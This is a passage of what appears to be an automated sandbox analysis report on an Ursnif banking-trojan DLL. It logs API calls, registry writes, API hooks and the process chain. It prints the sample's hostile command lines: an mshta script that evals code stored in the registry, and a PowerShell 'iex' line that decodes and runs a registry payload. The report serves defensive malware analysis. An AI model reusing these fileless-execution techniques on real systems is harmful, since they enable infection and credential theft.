Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439547E NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_0439547E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439C4B1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	1_2_0439C4B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043875AA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_043875AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439EDF2 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_0439EDF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439AE64 GetProcAddress,NtCreateSection,memset,	1_2_0439AE64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04393013 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_04393013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438B8EB NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_0438B8EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043938DD NtMapViewOfSection,	1_2_043938DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04392131 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_04392131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438B96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_0438B96C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439DB15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_0439DB15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439E3F9 NtQueryInformationProcess,	1_2_0439E3F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439FC10 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_0439FC10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439BE7C memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_0439BE7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043886CB NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_043886CB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439FF30 NtGetContextThread,RtlNtStatusToDosError,	1_2_0439FF30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04393F13 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_04393F13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439F7FD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_0439F7FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A096B memset,NtQueryInformationProcess,	1_2_043A096B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04392B53 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_04392B53

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04398C82 CreateProcessAsUserA,

1_2_04398C82

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438FCF3	1_2_0438FCF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A21B4	1_2_043A21B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439D1D5	1_2_0439D1D5

PE file does not import any functions

Source: crd40oh3.dll.34.dr	Static PE information: No import functions for PE file found
Source: pzrffmak.dll.38.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 6007d134e83fctar.dll

Binary or memory string: OriginalFilenameLiquid.dllH vs 6007d134e83fctar.dll

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Uses 32bit PE files

Source: 6007d134e83fctar.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@30/169@15/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0438A4FF CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

1_2_0438A4FF

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{64B624D4-730E-3681-1DD8-57CAA18C7B9E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F4A0C7E8-C357-461A-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4572:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF9B1E57DEDF99BFAF.TMP

Jump to behavior

Source: 6007d134e83fctar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6007d134e83fctar.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6007d134e83fctar.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17426 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82968 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17442 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8C67.tmp' 'c:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9D01.tmp' 'c:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6007d134e83fctar.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82968 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17442 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8C67.tmp' 'c:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9D01.tmp' 'c:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP'

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 6007d134e83fctar.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 6007d134e83fctar.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.411809654.000001F23FCA0000.00000002.00000001.sdmp, csc.exe, 00000026.00000002.422411494.000001D454620000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: 6007d134e83fctar.dll
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdbXP source: powershell.exe, 00000020.00000002.450999766.000001AE45C50000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdbXP source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp

Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04391007 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_04391007

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6007d134e83fctar.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A1CB0 push ecx; ret	1_2_043A1CB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04392746 push ecx; mov dword ptr [esp], 00000002h	1_2_04392747
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A21A3 push ecx; ret	1_2_043A21B3

Source: initial sample

Static PE information: section name: .text entropy: 6.91369474093

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
